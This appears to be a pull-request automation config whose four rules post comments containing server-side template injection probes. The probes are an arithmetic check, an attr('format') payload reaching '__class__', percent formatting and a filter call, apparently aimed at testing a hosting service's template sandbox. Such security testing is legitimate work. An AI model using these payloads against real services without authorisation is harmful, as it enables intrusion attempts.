pull_request_rules:
  - name: ssti-c1-math
    conditions:
      - base=main
      - head~=^test-comment-1-1-
    actions:
      comment:
        message: |
          SSTI-C1: {{ 7*7 }}
  - name: ssti-c2-attformat
    conditions:
      - base=main
      - head~=^test-comment-2-2-
    actions:
      comment:
        message: |
          SSTI-C2: {{ ''|attr('format')('{0.__class__}') }}
  - name: ssti-c3-percent
    conditions:
      - base=main
      - head~=^test-comment-3-3-
    actions:
      comment:
        message: |
          SSTI-C3: {{ "%d%%20" % 42 }}
  - name: ssti-c7-getsection
    conditions:
      - base=main
      - head~=^test-comment-7-7-
    actions:
      comment:
        message: |
          SSTI-C7: {{ body|get_section(".*", "NO-MATCH") }}